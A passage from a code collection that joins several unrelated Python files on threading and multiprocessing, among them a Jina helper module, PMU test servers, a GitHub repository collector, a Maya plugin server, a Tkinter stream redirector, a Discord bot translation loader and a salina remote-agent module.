return asyncio.run(func(*args, **kwargs))
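# Illustrative usage sketch, not part of the original helper.py: `_answer` is a made-up
# coroutine; from plain synchronous code it is run directly, while inside Jupyter the
# same call is routed through a helper thread.
def _demo_run_async():
    async def _answer():
        await asyncio.sleep(0)
        return 42
    assert run_async(_answer) == 42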
def slugify(value):
"""
    Normalize a string: strip surrounding whitespace, convert spaces to underscores, and remove characters that are not alphanumerics, underscores, hyphens, or dots.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
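# Illustrative usage sketch, not part of the original helper.py:
def _demo_slugify():
    assert slugify('My Executor v1.0!') == 'My_Executor_v1.0'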
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
    r = r'^[/\w\-\_\.]+\.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
    key 'b' can be referenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
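# Illustrative usage sketch, not part of the original helper.py: dunder keys address
# nested dicts by key and nested lists by integer index.
def _demo_dunder_get():
    data = {'a': {'b': 1}, 'c': [10, 20]}
    assert dunder_get(data, 'a__b') == 1
    assert dunder_get(data, 'c__1') == 20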
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
test_server_collect.py
|
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '../'))
from synchrophasor.frame import *
from synchrophasor.pmu import Pmu
from synchrophasor.pmuGen import *
from time import sleep
import threading
SLEEP_TIME = 1.0/100
def test_client_single_pmu():
pmu = create_pmu(9006)
pmu.ieee_data_sample.set_freq(1)
cnt = 0
while True:
sleep(SLEEP_TIME)
if pmu.clients:
pmu.send(pmu.ieee_data_sample)
pmu.join()
def test_client_2_pmus():
pmus = [create_pmu(port) for port in [9007, 9008]]
for i, pmu in enumerate(pmus):
pmu.ieee_data_sample.set_freq(i+1)
cnt = 0
while True:
sleep(SLEEP_TIME)
for pmu in pmus:
pmu.send(pmu.ieee_data_sample)
for pmu in pmus:
pmu.join()
def test_client_10_pmus():
nSources = 4
pmus = [create_pmu(port, log_level='DEBUG') for port in range(9009, 9009+nSources)]
# pmus = [create_pmu(port) for port in range(9009, 9009+nSources)]
for i, pmu in enumerate(pmus):
pmu.ieee_data_sample.set_freq(i+1)
cnt = 0
while True:
# sleep(SLEEP_TIME)
for pmu in pmus:
pmu.send(pmu.ieee_data_sample)
for pmu in pmus:
pmu.join()
if __name__ == "__main__":
test_list = [
# test_client_single_pmu,
# test_client_2_pmus,
test_client_10_pmus
]
threads = list()
for test in test_list:
x = threading.Thread(target=test)
threads.append(x)
x.start()
for index, thread in enumerate(threads):
thread.join()
|
test_app.py
|
import queue
import threading
from chatbot.speakeasy.app import App
# if __name__ == "__main__":
# app = App()
# while True:
# question = input("Ask:")
# threads = []
# q = queue.Queue()
# try:
# t = threading.Thread(target=app.get_response, args=(question, q,))
# t.start()
# t.join()
# response = q.get()
# print(f"A: {response}\n")
# except Exception as e:
# print("Error:", e)
questions = [
"Who is the director of the Batman movie?",
'Did Christopher Nolan ever work on a Batman movie?',
'What is the name of the lead actor in the movie Catch Me If You Can?',
'I like the Jurassic Park movie; can you recommend any similar movies?',
'I am a big fan of Steven Spielberg, could you recommend some of his action movies?',
'Show me the pictures of the lead actors of the movie Jurassic Park.',
'Can you show me the poster of the movie Batman?',
'Show me an action movie poster.',
"What's the box office of the movie E.T. the Extra-Terrestrial?"
]
app = App()
for question in questions:
threads = []
q = queue.Queue()
try:
t = threading.Thread(target=app.get_response, args=(question, q,))
t.start()
t.join()
response = q.get()
print(f"A: {response}\n")
except Exception as e:
print("Error:", e)
|
repositories.py
|
import datetime
import pandas as pd
import re
import time
import threading
from flask import make_response, send_file
from flask_restful import Resource, reqparse
from repocollector.github import GithubRepositoriesCollector
def is_ansible_dir(path: str) -> bool:
"""
Check whether the path is an Ansible directory
:param path: a path
:return: True if the path is one of the standard Ansible directory names; False otherwise
"""
return path in ('playbooks', 'meta', 'tasks', 'handlers', 'roles')
def is_ansible_repository(full_name: str, description: str, root_dirs: list) -> bool:
"""
Check if the repository has Ansible files
:param full_name: the repository full name (owner/name)
:param description: the repository's description
:param root_dirs: a list of directory names at the root of the repository
:return: True if the repository has Ansible files; False otherwise
"""
return 'ansible' in description.lower() \
or 'ansible' in full_name.lower() \
or sum([1 for path in root_dirs if is_ansible_dir(path)]) >= 2
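# A quick illustrative sketch (not used by the API) of how the heuristic above
# behaves; the repository names, descriptions and directory listings are made up.
def _is_ansible_repository_example():
    # two or more typical Ansible directories at the repository root
    assert is_ansible_repository('octo/webserver', 'infrastructure code', ['roles', 'tasks', 'docs'])
    # the word 'ansible' appears in the description
    assert is_ansible_repository('octo/webserver', 'Ansible playbooks for X', ['src'])
    # nothing suggests Ansible
    assert not is_ansible_repository('octo/webserver', 'a web app', ['src', 'docs'])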
class Repositories(Resource):
def __init__(self, **kwargs):
self.db = kwargs['db']
def get(self):
repos_df = pd.DataFrame()
repositories = self.db.collection('repositories').stream()
for repo in repositories:
repos_df = repos_df.append({
'full_name': repo.to_dict()['full_name'],
'id': repo.to_dict()['id']
}, ignore_index=True)
response = make_response(repos_df.to_csv(index=False))
response.headers["Content-Disposition"] = "attachment; filename=repositories.csv"
response.headers["Content-Type"] = "text/csv"
return response
def post(self):
""" Collect repositories from GitHub based on search criteria """
parser = reqparse.RequestParser()
parser.add_argument('token', type=str, required=True)
parser.add_argument('start', type=str, required=True)
parser.add_argument('end', type=str, required=True)
parser.add_argument('language', type=str, required=True)
parser.add_argument('pushed_after', type=str, required=True)
parser.add_argument('timedelta', type=str, required=False)
parser.add_argument('min_stars', type=int, required=False)
parser.add_argument('min_releases', type=int, required=False)
args = parser.parse_args()
# Create Task
task_id = self.db.collection('tasks').add({
'name': 'crawling',
'language': args.get('language'),
'status': 'progress',
'started_at': time.time()
})[1].id
print(task_id)
thread = threading.Thread(target=self.run_task, name="collect-repositories", args=(args, task_id))
thread.start()
return make_response({}, 202)
def run_task(self, args: dict, task_id):
status = 'progress'
# Extract the YYYY-MM-DD date portion from the ISO-style datetime strings (e.g. '2021-10-04T00:00:00...')
since = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', args.get('start'))[0]
until = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', args.get('end'))[0]
pushed_after = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', args.get('pushed_after'))[0]
# and convert to datetime object
since = datetime.datetime.strptime(since, '%Y-%m-%d')
until = datetime.datetime.strptime(until, '%Y-%m-%d')
pushed_after = datetime.datetime.strptime(pushed_after, '%Y-%m-%d')
try:
while since <= until:
github_crawler = GithubRepositoriesCollector(
access_token=args.get('token'),
since=since,
until=since + datetime.timedelta(days=1),
pushed_after=pushed_after,
min_issues=0,
min_releases=args.get('min_releases', 0),
min_stars=args.get('min_stars', 0),
min_watchers=0,
primary_language=args.get('language') if args.get('language') not in ('ansible', 'tosca') else None
)
for repo in github_crawler.collect_repositories():
if args.get('language') == 'ansible' and not is_ansible_repository(f'{repo["owner"]}/{repo["name"]}', repo['description'], repo['dirs']):
continue
elif args.get('language') == 'tosca':
continue
else:
repo_ref = self.db.collection('repositories').document(str(repo['id']))
repo_ref.set({
'id': repo['id'],
'full_name': f'{repo["owner"]}/{repo["name"]}',
'url': repo['url'],
'default_branch': repo['default_branch']
})
since += datetime.timedelta(days=1)
status = 'completed'
except Exception as e:
status = 'failed'
print(e)
print(github_crawler.quota, github_crawler.quota_reset_at)
finally:
doc_ref = self.db.collection('tasks').document(task_id)
doc_ref.update({
'status': status,
'ended_at': time.time()
})
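# Illustrative sketch (added for clarity, not called by the resource): run_task
# expects ISO-style datetime strings and keeps only the YYYY-MM-DD part before
# parsing, as shown here with a made-up input value.
def _parse_iso_date_example():
    raw = '2021-10-04T00:00:00.000Z'  # hypothetical value of args['start']
    day = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', raw)[0]
    return datetime.datetime.strptime(day, '%Y-%m-%d')  # -> datetime(2021, 10, 4)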
|
plugin.py
|
import os
import time
import threading
import json
import sys
import atexit
import logging
import BaseHTTPServer
import SocketServer
import maya.cmds
import assetexchange_shared
class ThreadingHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""Handle requests in a separate thread."""
_http_servers = dict()
def register_plugin(plugin_uid, plugin_info, AssetPushService=None, misc_services={}):
# prevent double registration
global _http_servers
if plugin_uid in _http_servers:
raise RuntimeError('add-on already registered')
# prepare logger
logger = logging.getLogger(plugin_uid)
logger.setLevel(logging.INFO)
# add console handler
if not hasattr(logger, '_has_console_handler'):
console_log = logging.StreamHandler()
console_log.setLevel(logging.DEBUG)
console_log.setFormatter(logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(console_log)
setattr(logger, '_has_console_handler', True)
# check if push service is derived properly
if AssetPushService is not None:
if not issubclass(AssetPushService, assetexchange_shared.server.AssetPushServiceInterface):
raise RuntimeError(
'AssetPushService should inherit AssetPushServiceInterface')
# setup registry
service_registry = {}
if AssetPushService is not None:
service_registry['assetninja.assetpush#1'] = AssetPushService
service_registry.update(misc_services)
service_registry = {key: val for key,
val in service_registry.items() if val is not None}
# setup http protocol handler
class HttpServerRequestHandler(assetexchange_shared.server.HttpServerRequestHandler):
# copy logger over
_logger = logger
# override logger getter
def get_logger(self):
return self._logger
# copy service registry over
_service_registry = service_registry
# override service registry getter
def get_service_registry(self):
return self._service_registry
# start http server using a free port
_http_servers[plugin_uid] = ThreadingHTTPServer(
('127.0.0.1', 0),
HttpServerRequestHandler
)
thread = threading.Thread(
target=_http_servers[plugin_uid].serve_forever)
# note: required for maya exit, otherwise it will block (even though we have an atexit handler)
thread.setDaemon(True)
thread.start()
# retrieve port (no race condition here, as it is available right after construction)
port = _http_servers[plugin_uid].server_address[1]
logger.info("port=" + str(port))
# write registration file
regfile = assetexchange_shared.server.service_entry_path(
'extension.maya', plugin_uid)
with open(regfile, 'w') as portfile:
portfile.write(json.dumps({
'category': 'extension.maya',
'type': plugin_uid,
'pid': os.getpid(),
'port': port,
'protocols': ['basic'],
'info': {
'extension.uid': plugin_uid,
'extension.name': plugin_info['name'],
'extension.description': plugin_info['description'],
'extension.author': plugin_info['author'],
'extension.version': plugin_info['version'],
'maya.executable': sys.executable,
'maya.version': maya.cmds.about(version=True),
},
'services': list(service_registry.keys()),
}, indent=2))
def unregister_plugin(plugin_uid):
# fetch logger
logger = logging.getLogger(plugin_uid)
# try to remove registration file
regfile = assetexchange_shared.server.service_entry_path(
'extension.maya', plugin_uid)
for _ in range(5):
if os.path.exists(regfile):
try:
logger.info('trying to remove registration file')
os.remove(regfile)
except Exception:
logger.exception(
"assetninja: could not remove registration file")
time.sleep(1)
continue
else:
break
else:
break
# shutdown server
global _http_servers
if plugin_uid in _http_servers:
logger.info('shutdown http server')
_http_servers[plugin_uid].shutdown()
del _http_servers[plugin_uid]
@atexit.register
def unregister_plugins():
global _http_servers
for plugin_uid in list(_http_servers.keys()):
unregister_plugin(plugin_uid)
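# Hedged usage sketch (illustrative only): how a Maya add-on might register
# itself with this module. The uid, metadata and service class below are
# hypothetical; AssetPushServiceInterface comes from assetexchange_shared.
#
#     class MyPushService(assetexchange_shared.server.AssetPushServiceInterface):
#         pass  # implement the push methods required by the interface
#
#     register_plugin(
#         'com.example.myplugin',
#         {
#             'name': 'My Plugin',
#             'description': 'Example asset push integration',
#             'author': 'Example Author',
#             'version': '1.0.0',
#         },
#         AssetPushService=MyPushService,
#     )
#     # ... and on unload:
#     unregister_plugin('com.example.myplugin')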
|
std_stream_redirector.py
|
#!/usr/bin/env python3
# Copyright (c) 2019, Alchemy Meister
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
"""
import time
import queue
import threading
class StdStreamRedirector():
"""
"""
INITIAL_SHORT_DELAY = 2
def __init__(
self, widget, widget_config, file_config=None, callback=None
):
self.widget = widget
self.tag = widget_config.get('tag')
self.auto_scroll = widget_config.get('auto_scroll', True)
self.save_to_file = False
self.file = None
if file_config:
self.file_path = file_config.get('file_path')
if self.file_path:
self.save_to_file = file_config.get('save_to_file', True)
if self.save_to_file:
self.file = open(
self.file_path,
file_config.get('write_mode', 'w'),
encoding='utf-8'
)
self.callback = callback
self.queue = queue.Queue()
self.__run_queue_checker = False
self.widget_updater = None
self.last_executed_time = None
self.delay = StdStreamRedirector.INITIAL_SHORT_DELAY
def write(self, *args):
if args:
if self.__run_queue_checker:
self.__async_write(*args)
else:
self.__sync_write(*args)
def write_file(self, file_path, callback=None):
def _read_file(file_path):
with open(file_path, 'r') as r_file:
for line in r_file:
self.queue.put(line)
self.queue.put('\n')
self.queue.put(False)
self.__run_queue_checker = True
self.__update_widget(callback=callback)
threading.Thread(target=_read_file, args=(file_path,)).start()
def flush(self):
pass
def close(self):
if self.file:
self.file.close()
def set_file_path(self, path):
self.file_path = path
def enable_save_to_file(self, enable):
self.save_to_file = enable
if enable and not self.file:
if not self.file_path:
raise Exception('save to file enabled, but file path is None')
self.file = open(self.file_path, 'w')
def enable_auto_scroll(self, enable):
self.auto_scroll = enable
def __async_write(self, *args):
def _write(args):
if len(args) == 1:
string = str(args[0])
else:
string = str(args)
if string and string[-1] != '\n':
self.queue.put(''.join([string, '\n']))
elif string:
self.queue.put(string)
threading.Thread(target=_write, args=(args,)).start()
def __sync_write(self, *args):
if len(args) == 1:
string = str(args[0])
else:
string = str(args)
if string and string[-1] != '\n':
self.__write_on_widget(''.join([string, '\n']))
elif string:
self.__write_on_widget(string)
def __write_to_file(self, string):
self.file.write(string)
self.file.flush()
def __write_on_widget(self, message):
self.widget.configure(state='normal')
self.widget.insert('end', message, (self.tag,))
self.widget.configure(state='disabled')
if self.auto_scroll:
self.widget.see('end')
if self.save_to_file:
threading.Thread(
target=self.__write_to_file,
args=(message,)
).start()
if self.callback:
self.callback(message)
def __update_widget(self, callback=None):
try:
message = self.queue.get_nowait()
if isinstance(message, str):
self.__write_on_widget(message)
self.__update_delay()
else:
self.__run_queue_checker = False
except queue.Empty:
pass
if self.__run_queue_checker:
self.widget.after(
self.delay,
lambda: self.__update_widget(callback=callback)
)
elif callback:
callback()
def __update_delay(self):
if self.last_executed_time is None:
self.last_executed_time = time.time()
else:
now = time.time()
elapsed_time = 1000 * (now - self.last_executed_time)
avg_delay = (self.delay * 0.8 + elapsed_time * 0.2) / 2
if avg_delay > StdStreamRedirector.INITIAL_SHORT_DELAY:
self.delay = int(avg_delay)
self.last_executed_time = now
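# A minimal usage sketch (assumption: the widget is a Tkinter Text widget, which
# matches the configure/insert/see/after calls above); added for illustration only.
def _std_stream_redirector_example():
    import sys
    import tkinter as tk

    root = tk.Tk()
    text = tk.Text(root)
    text.pack()

    redirector = StdStreamRedirector(
        text,
        {'tag': 'stdout', 'auto_scroll': True},
        file_config={'file_path': 'session.log', 'save_to_file': False},
    )
    sys.stdout = redirector  # print() output now lands in the Text widget
    print('hello from the widget')
    root.mainloop()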
|
Translator.py
|
import asyncio
import hashlib
import json
import threading
import urllib.parse
import requests
from parsimonious import ParseError, VisitationError
from pyseeyou import format
from Util import Configuration, GearbotLogging, Emoji, Utils
LANGS = dict()
LANG_NAMES = dict(en_US= "English")
LANG_CODES = dict(English="en_US")
BOT = None
untranlatable = {"Sets a playing/streaming/listening/watching status", "Reloads all server configs from disk", "Reset the cache", "Make a role pingable for announcements", "Pulls from github so an upgrade can be performed without full restart", ''}
async def initialize(bot_in):
global BOT
BOT = bot_in
await load_codes()
await update_all()
for lang in LANG_CODES.values():
load_translations(lang)
def load_translations(lang):
LANGS[lang] = Utils.fetch_from_disk(f"lang/{lang}")
def translate(key, location, **kwargs):
lid = None
if location is not None:
if hasattr(location, "guild"):
location = location.guild
if location is not None and hasattr(location, "id"):
lid = location.id
else:
lid = location
if lid is None:
lang_key = "en_US"
else:
lang_key = Configuration.get_var(lid, "GENERAL", "LANG")
translated = key
if key not in LANGS[lang_key]:
if key not in untranlatable:
BOT.loop.create_task(tranlator_log('WARNING', f'Untranslatable string detected in {lang_key}: {key}\n'))
untranlatable.add(key)
return key if key not in LANGS["en_US"] else format(LANGS['en_US'][key], kwargs, 'en_US')
try:
translated = format(LANGS[lang_key][key], kwargs, lang_key)
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt translation detected!\n**Lang code:** {lang_key}\n**Translation key:** {key}\n```\n{LANGS[lang_key][key]}```'))
GearbotLogging.exception("Corrupt translation", ex)
if key in LANGS["en_US"].keys():
try:
translated = format(LANGS['en_US'][key], kwargs, 'en_US')
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt English source string detected!\n**Translation key:** {key}\n```\n{LANGS["en_US"][key]}```'))
GearbotLogging.exception('Corrupt translation', ex)
return translated
def translate_by_code(key, code, **kwargs):
if key not in LANGS[code]:
return key
return format(LANGS[code][key], kwargs, code)
async def upload():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY="", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
new = hashlib.md5(open(f"lang/en_US.json", 'rb').read()).hexdigest()
old = Configuration.get_persistent_var('lang_hash', '')
if old == new:
return
Configuration.set_persistent_var('lang_hash', new)
message = await tranlator_log('REFRESH', 'Uploading translation file')
t = threading.Thread(target=upload_file)
t.start()
while t.is_alive():
await asyncio.sleep(1)
await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations file has been uploaded")
await update_all()
def upload_file():
data = {'files[/bot/commands.json]': open('lang/en_US.json', 'r')}
crowdin_data = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
reply = requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?login={crowdin_data['LOGIN']}&account-key={crowdin_data['KEY']}&json", files=data)
GearbotLogging.info(reply)
async def load_codes():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
GearbotLogging.info(f"Getting all translations from {t_info['SOURCE']}...")
# pick the URL to fetch the list of available languages from
if t_info["SOURCE"] == "CROWDIN":
list_link = f"https://api.crowdin.com/api/project/gearbot/status?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json"
else:
list_link = "https://gearbot.rocks/lang/langs.json"
async with BOT.aiosession.get(list_link) as resp:
info = await resp.json()
l = list()
for lang in info:
l.append(dict(name=lang["name"], code=lang["code"]))
LANG_NAMES[lang["code"]] = lang["name"]
LANG_CODES[lang["name"]] = lang["code"]
Utils.save_to_disk("lang/langs", l)
async def update_all():
futures = [update_lang(lang) for lang in LANG_CODES.values() if lang != "en_US"]
for chunk in Utils.chunks(futures, 20):
await asyncio.gather(*chunk)
async def update_lang(lang, retry=True):
t_info = Configuration.get_master_var("TRANSLATIONS")
if t_info["SOURCE"] == "DISABLED": return
if t_info["SOURCE"] == "CROWDIN":
download_link = f"https://api.crowdin.com/api/project/gearbot/export-file?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json&file={urllib.parse.quote('/bot/commands.json', safe='')}&language={lang}"
else:
download_link = f"https://gearbot.rocks/lang/{lang}.json"
GearbotLogging.info(f"Updating {lang} ({LANG_NAMES[lang]}) file...")
async with BOT.aiosession.get(download_link) as response:
content = await response.text()
content = json.loads(content)
if "success" in content:
if retry:
GearbotLogging.warn(f"Failed to update {lang} ({LANG_NAMES[lang]}), trying again in 3 seconds")
await asyncio.sleep(3)
await update_lang(lang, False)
else:
await tranlator_log('NO', f"Failed to update {lang} ({LANG_NAMES[lang]}) from {t_info['SOURCE']}")
Utils.save_to_disk(f'lang/{lang}', content)
LANGS[lang] = content
GearbotLogging.info(f"Updated {lang} ({LANG_NAMES[lang]})!")
async def tranlator_log(emoji, message, embed=None):
m = f'{Emoji.get_chat_emoji(emoji)} {message}'
return await get_translator_log_channel()(m, embed=embed)
def get_translator_log_channel():
crowdin = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
channel = BOT.get_channel(crowdin["CHANNEL"]) if crowdin is not None else None
return channel.send if channel is not None else GearbotLogging.bot_log
|
remote.py
|
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import copy
import time
import torch
import torch.multiprocessing as mp
from salina import Agent
from salina.workspace import Workspace, _SplitSharedWorkspace
def f(agent, in_queue, out_queue, seed):
"""The function that is executed in a single process"""
out_queue.put("ok")
running = True
old_workspace = None
print("Seeding remote agent with ", seed)
agent.seed(seed)
while running:
command = in_queue.get()
if command[0] == "go_new_workspace":
_, workspace, kwargs = command
old_workspace = workspace
agent(workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "go_reuse_workspace":
_, _, kwargs = command
agent(old_workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "exit":
out_queue.put("ok")
return
elif command[0] == "eval_mode":
agent.eval()
out_queue.put("ok")
elif command[0] == "train_mode":
agent.train()
out_queue.put("ok")
class RemoteAgent(Agent):
"""It corresponds to an agent that is executed in another process
Args:
Agent ([salina.Agent]): the agent to execute in another process
"""
def __init__(self, agent, name=None):
super().__init__(name=name)
self.agent = agent
self._is_running = False
self.process = None
self.last_workspace = None
self.train_mode = True
def get_by_name(self, n):
if self._name == n:
return [self] + self.agent.get_by_name(n)
else:
return self.agent.get_by_name(n)
def forward(self, **kwargs):
raise NotImplementedError
def _create_process(self):
print("[RemoteAgent] starting process...")
self.i_queue = mp.Queue()
self.o_queue = mp.Queue()
self.i_queue.cancel_join_thread()
self.o_queue.cancel_join_thread()
self.process = mp.Process(
target=f, args=(self.agent, self.i_queue, self.o_queue, self._seed)
)
self.process.daemon = False
self.process.start()
r = self.o_queue.get()
def __call__(self, workspace, **kwargs):
with torch.no_grad():
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
self.train(self.train_mode)
if not workspace == self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
r = self.o_queue.get()
assert r == "ok"
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
r = self.o_queue.get()
assert r == "ok"
def _asynchronous_call(self, workspace, **kwargs):
"""Non-blocking forward. To use together with `is_running`"""
with torch.no_grad():
self._is_running = True
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
if not workspace == self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
def train(self, f=True):
self.train_mode = f
if self.process is None:
return
if f:
self.i_queue.put(("train_mode",))
a = self.o_queue.get()
assert a == "ok"
else:
self.eval()
def eval(self):
self.train_mode = False
if self.process is None:
return
self.i_queue.put(("eval_mode",))
a = self.o_queue.get()
assert a == "ok"
def seed(self, _seed):
self._seed = _seed
def _running_queue(self):
return self.o_queue
def is_running(self):
if self._is_running:
try:
r = self.o_queue.get(False)
assert r == "ok"
self._is_running = False
except Exception:
pass
return self._is_running
def close(self):
if self.process is None:
return
print("[RemoteAgent] closing process")
self.i_queue.put(("exit",))
self.o_queue.get()
time.sleep(0.1)
self.process.terminate()
self.process.join()
self.i_queue.close()
self.o_queue.close()
time.sleep(0.1)
del self.i_queue
del self.o_queue
self.process = None
def __del__(self):
self.close()
class NRemoteAgent(Agent):
"""Multiple agents executed in different processes. Use the `NRemoteAgent.create` function to create such an agent"""
def __init__(self, agents, batch_dims):
super().__init__()
self.agents = agents
self.batch_dims = batch_dims
def get_by_name(self, name):
r = []
if self._name == name:
r = [self]
for a in self.agents:
r = r + a.get_by_name(name)
return r
@staticmethod
def create(agent, num_processes=0, time_size=None, **extra_kwargs):
"""Returns a NRemote agent with num_processes copies of agent in different processes
Also returns the specific workspace to use with such an agent
Args:
agent ([salina.Agent]): The agent to execute in multiple processes
num_processes (int, optional): Number of processes to create. If 0, then no processes are created (for debugging). Defaults to 0.
time_size ([type], optional): If specified, it forces the created Workspace to have this particular time_size. Defaults to None.
Returns:
[salina.Agent,salina.SharedWorkspace]: The NRemoteAgent and the corresponding workspace
"""
agent.seed(0)
if num_processes == 0:
workspace = Workspace()
_agent = copy.deepcopy(agent)
agent(workspace, **extra_kwargs)
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=1, time_size=time_size
)
return _agent, shared_workspace
workspace = Workspace()
agents = [copy.deepcopy(agent) for t in range(num_processes)]
agent(workspace, **extra_kwargs)
b = workspace.batch_size()
batch_dims = [(k * b, k * b + b) for k, a in enumerate(agents)]
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=num_processes, time_size=time_size
)
agents = [RemoteAgent(a) for a in agents]
return NRemoteAgent(agents, batch_dims), shared_workspace
def __call__(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
for a in self.agents:
ok = a._running_queue().get()
assert ok == "ok"
def seed(self, seed, inc=1):
s = seed
for a in self.agents:
a.seed(s)
s += inc
def _asynchronous_call(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
